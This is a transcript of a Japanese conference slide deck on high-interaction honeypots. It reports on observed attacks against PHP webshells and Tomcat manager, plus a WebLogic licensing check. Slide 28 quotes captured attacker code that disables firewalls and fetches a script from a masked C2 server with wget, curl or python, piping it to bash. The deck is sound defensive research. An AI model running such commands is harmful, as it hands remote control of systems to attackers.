高対話型ハニーポットに乗り込んで厄災(リスク)を攻略し希望(リターン)を持ち帰る話

Bb6c58824da6ffb4aa734173e50bb7a0?s=47 graneed
February 23, 2019

 高対話型ハニーポットに乗り込んで厄災(リスク)を攻略し希望(リターン)を持ち帰る話

2019年2月23日の元祖 濱せっく #2でLTした資料です。

攻撃事例の詳細はこちら。

WebShell型ハニーポットを設置してWebShellに対するスキャンを観察した
https://graneed.hatenablog.com/entry/2019/01/23/000924

Tomcatの管理機能に対するパスワードクラック後の攻撃を観察する
https://graneed.hatenablog.com/entry/2019/02/15/090727

Bb6c58824da6ffb4aa734173e50bb7a0?s=128

graneed

February 23, 2019
Tweet

Transcript

  1. 4.

    4 ハニーポットの分類 コロナ社「実践サイバーセキュリティモニタリング」より ハニーポット 攻撃経路 インタラクション サーバ クライアント ハニートークン 高対話

    ハイブリッド 低対話 分類 低対話型と高対話型の比較 インタラクション 検知精度 情報収集 偽装性 スケーラビリ ティ 安全性 低対話型 低 低 低 高 高 高対話型 高 高 高 低 低 本LTで話すテーマ
  2. 13.
  3. 15.
  4. 17.
  5. 23.
  6. 24.

    許可 24 実は、T3プロトコル(WeblogicのRMI仕様の実装)を ターゲットとした攻撃を観察したいため、 WebLogic Server環境も搭載しようと、 Oracle社に確認してみました。 個人でセキュリティ・リサーチを目的に、開発者向け WebLogic Server(以降、WLS)を使用して

    ハニーポット(攻撃者からの不正アクセスの観察を目的としたシステム )を構築したいと考えています。 (途中略) この利用目的の場合、 OTNライセンスの範囲で開発者向け WebLogic Serverを使用可能でしょうか? 質問
  7. 25.

    許可 25 実は、T3プロトコル(WeblogicのRMI仕様の実装)を ターゲットとした攻撃を観察したいため、 WebLogic Server環境も搭載しようと、 Oracle社に確認してみました。 個人でセキュリティ・リサーチを目的に、開発者向け WebLogic Server(以降、WLS)を使用して

    ハニーポット(攻撃者からの不正アクセスの観察を目的としたシステム )を構築したいと考えています。 (途中略) この利用目的の場合、 OTNライセンスの範囲で開発者向け WebLogic Serverを使用可能でしょうか? 質問 WebLogic ServerのOTN契約書の記載内容は以下リンク先をご参照ください。 <OTN Free Developer License Agreement> https://www.oracle.com/technetwork/licenses/wls-dev-license-1703567.html <【日本語参考訳】>※上記の日本語訳です http://www.oracle.com/technetwork/jp/licenses/wls-dev-license-1703567-ja.html また上記OTNライセンス契約には、次の条件が規定されています。 規約に完全同意していただく必要があるため、詳細はライセンス契約をお読みください。 <利用条件> ・1台の開発者のデスクトップ上で稼働し、  1ユーザーしかアクセスしない Weblogic Server環境のみ対象 (共有開発不可) 回答 使用NG 使用するソフトウェアのライセンスの許可に注意
  8. 27.

    観察事例1.PHP 27 低対話型 で観測 ①POST /hoge.php  fuga=die(@md5(J4nur4ry)); 4df5791c3e09e5c7faa7b3ce35d9cd4b ②POST /hoge.php

     images.php設置リクエスト ③POST /images.php  a=just for fun&code=文字列出力コード(BASE64エンコード) Hello, Peppa! ④POST /images.php  a=just for fun&code=システム情報出力コード (BASE64エンコード) システム情報 ⑤POST /images.php  a=just for fun&code=攻撃コード(BASE64エンコード) C2サーバ通信& 任意シェル実行 高対話型で観測
  9. 28.

    観察事例1.PHP 攻撃コード抜粋 $PS='/etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2

    stop;'; echo(@execute($PS)?'success':'failed'); $PS='(wget -U "Mozilla/WGET" -q -O- http://XXX.XXX.XXX.XXX/Update/test/i.php || curl -A "Mozilla/CURL" -fsSL http://XXX.XXX.XXX.XXX/Update/test/i.php || python -c "from urllib2 import urlopen,Request; print(urlopen(Request(\'http://XXX.XXX.XXX.XXX/Update/test/i.php\', None,{\'User-Agent\':\'Mozilla/Python2\'})).read());" ) | /bin/bash'; die(@execute($PS)?'success':'failed'); ①Firewallの停止 ②C2サーバからシェルスクリプト取得して実行 (wget、curlまたはpythonのいずれかを使用) ① ②
  10. 29.

    観察事例2.Apache Tomcat 29 低対話型 で観測 ①パスワードクラック ②POST /admin-manager/admin.jsp  act=SI ③GET

    /manager/html  BASIC認証のID/Password ④WARファイルアップロード&デプロイ ⑥POST /admin-manager/admin.jsp  act=SH&p2=True&p1=攻撃コマンド(BASE64エンコード) C2サーバ通信& 任意シェル実行 高対話型で観測 認証OK ⑤POST /admin-manager/admin.jsp  act=SI システム情報
  11. 30.

    まとめ 30 github :https://github.com/graneed/bwpot Blog :https://graneed.hatenablog.com/ →本日ご紹介した事例の詳細レポート記事もあります Twitter :@graneed111 高対話型のハニーポットを設置すると、

    攻撃者の生の動きを観察できるかもしれません 「許可」「手段」「資格」「契約」を得て、 ハニーポットに乗り込んで出航しませんか!